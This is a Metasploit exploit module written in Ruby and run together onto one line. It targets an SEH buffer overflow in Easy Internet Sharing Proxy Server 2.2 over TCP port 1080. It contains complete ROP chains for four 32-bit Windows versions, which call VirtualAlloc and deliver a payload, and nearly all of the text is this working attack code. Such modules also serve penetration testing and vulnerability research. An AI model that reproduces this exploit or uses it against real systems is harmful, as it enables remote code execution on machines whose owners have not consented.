## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Easy Internet Sharing Proxy Server 2.2 SEH buffer Overflow', 'Description' => %q{ This module exploits a SEH buffer overflow in the Easy Internet Sharing Proxy Socks Server 2.2 }, 'Platform' => 'win', 'Author' => [ 'tracyturben[at]gmail.com' ], 'License' => MSF_LICENSE, 'References' => [ [ %w{URL http://www.sharing-file.com/products.htm}] ], 'Privileged' => false, 'Payload' => { 'Space' => 836, 'BadChars' => '\x90\x3b\x0d\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c', 'StackAdjustment' => -3500, }, 'Targets'=> [ [ 'Windows 10 32bit', { 'Ret' => 0x0043AD2C,'Offset' => 836,'Nops' => 44 } ], [ 'Windows 8.1 32bit SP1', { 'Ret' => 0x0043AD30,'Offset' => 908 } ], [ 'Windows 7 32bit SP1', { 'Ret' => 0x0043AD38,'Offset' => 884 } ], [ 'Windows Vista 32bit SP2 ', { 'Ret' => 0x0043AD38,'Offset' => 864 } ] ], 'DefaultOptions'=>{ 'RPORT'=> 1080, 'EXITFUNC'=> 'thread' }, 'DisclosureDate' => 'Nov 10 2016', 'DefaultTarget'=> 0)) end def exploit connect rop_gadgets ='' if target.name =~ /Vista 32bit/ print_good("Building Windows Vista Rop Chain") rop_gadgets = [ 0x0043fb03, 0x0043fb03, 0x0043fb03, 0x0043fb03, 0x0043fb03, 0x00454559, # POP EAX # RETN [easyproxy.exe] 0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe] 0x00462589, # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe] 0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe] 0x004543b2, # POP EBP # RETN [easyproxy.exe] 0x41414141, # Filler (RETN offset compensation) 0x00417771, # & push esp # ret 0x1C [easyproxy.exe] 0x0046764d, # POP EBX # RETN [easyproxy.exe] 0x00000001, # 0x00000001-> ebx 0x004532e5, # POP EBX # RETN [easyproxy.exe] 0x00001000, # 0x00001000-> edx 0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe] 0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe] 0x00000001, # size 0x00486fac, # POP ECX # RETN [easyproxy.exe] 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x00000040, # 0x00000040-> ecx 0x0044fc45, # POP EDI # RETN [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0045460d, # POP EAX # RETN [easyproxy.exe] 0x90909090, # nop 0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe] ].flatten.pack('V*') print_good('Building Exploit...') sploit = "\x90" *46 sploit << rop_gadgets sploit << payload.encoded sploit << rand_text_alpha(target['Offset'] - payload.encoded.length) sploit << generate_seh_record(target.ret) print_good('Sending exploit...') sock.put(sploit) print_good('Exploit Sent...') handler disconnect end if target.name =~ /7 32bit/ print_good('Building Windows 7 Rop Chain') rop_gadgets = [ 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0047da72, # POP EAX # RETN [easyproxy.exe] 0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe] 0x004510a3, # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe] 0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe] 0x00450e40, # POP EBP # RETN [easyproxy.exe] 0x41414141, # Filler (RETN offset compensation) 0x00417865, # & push esp # ret 0x1C [easyproxy.exe] 0x0046934a, # POP EBX # RETN [easyproxy.exe] 0x00000001, # 0x00000001-> ebx 0x0045a5b4, # POP EBX # RETN [easyproxy.exe] 0x00001000, # 0x00001000-> edx 0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe] 0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe] 0x00000001, # size 0x0047a3bf, # POP ECX # RETN [easyproxy.exe] 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x00000040, # 0x00000040-> ecx 0x00453ce6, # POP EDI # RETN [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x00478ecd, # POP EAX # RETN [easyproxy.exe] 0x90909090, # nop 0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe] ].flatten.pack('V*') print_good('Building Exploit...') sploit = "\x90" *26 sploit << rop_gadgets sploit << payload.encoded sploit << rand_text_alpha(target['Offset'] - payload.encoded.length) sploit << generate_seh_record(target.ret) print_good('Sending exploit...') sock.put(sploit) print_good('Exploit Sent...') sleep(5) handler disconnect end if target.name =~ /8.1 32bit/ print_good('Building Windows 8 Rop Chain') rop_gadgets = [ 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0047da72, # POP EAX # RETN [easyproxy.exe] 0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe] 0x004510a3, # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe] 0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe] 0x00450e40, # POP EBP # RETN [easyproxy.exe] 0x41414141, # Filler (RETN offset compensation) 0x00417865, # & push esp # ret 0x1C [easyproxy.exe] 0x0046934a, # POP EBX # RETN [easyproxy.exe] 0x00000001, # 0x00000001-> ebx 0x0045a5b4, # POP EBX # RETN [easyproxy.exe] 0x00001000, # 0x00001000-> edx 0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe] 0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe] 0x00000001, # size 0x0047a3bf, # POP ECX # RETN [easyproxy.exe] 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x00000040, # 0x00000040-> ecx 0x00453ce6, # POP EDI # RETN [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x00478ecd, # POP EAX # RETN [easyproxy.exe] 0x90909090, # nop 0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe] ].flatten.pack('V*') print_good('Building Exploit...') sploit = "\x90" *2 sploit << rop_gadgets sploit << payload.encoded sploit << rand_text_alpha(target['Offset'] - payload.encoded.length) sploit << generate_seh_record(target.ret) print_good('Sending exploit...') sock.put(sploit) print_good('Exploit Sent...') handler disconnect end if target.name =~ /10 32bit/ print_good('Building Windows 10 Rop Chain') rop_gadgets = [ 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x0047f1de, # POP EBX # RETN [easyproxy.exe] 0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe] 0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe] 0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe] 0x41414141, # Filler (compensate) 0x00438d30, # MOV EAX,DWORD PTR DS:[EDX] # RETN [easyproxy.exe] 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe] 0x004676b0, # POP EBP # RETN [easyproxy.exe] 0x41414141, # Filler (RETN offset compensation) 0x00417771, # & push esp # ret 0x1C [easyproxy.exe] 0x0046bf38, # POP EBX # RETN [easyproxy.exe] 0x00000001, # 0x00000001-> ebx 0x00481477, # POP EBX # RETN [easyproxy.exe] 0x00001000, # 0x00001000-> edx 0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe] 0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe] 0x00000001, # Filler (compensate) 0x00488098, # POP ECX # RETN [easyproxy.exe] 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x00000040, # 0x00000040-> ecx 0x0044ca38, # POP EDI # RETN [easyproxy.exe] 0x0043fb03, # RETN (ROP NOP) [easyproxy.exe] 0x00454559, # POP EAX # RETN [easyproxy.exe] 0x90909090, # nop 0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe] ].flatten.pack('V*') print_good('Building Exploit...') sploit = "\x90" *2 sploit << rop_gadgets sploit << payload.encoded sploit << make_nops(target['Nops']) sploit << rand_text_alpha(target['Offset'] - payload.encoded.length) sploit << generate_seh_record(target.ret) print_good('Sending exploit...') sock.put(sploit) print_good('Exploit Sent...') handler disconnect end end end # Iranian Exploit DataBase = http://IeDb.Ir [2016-11-16]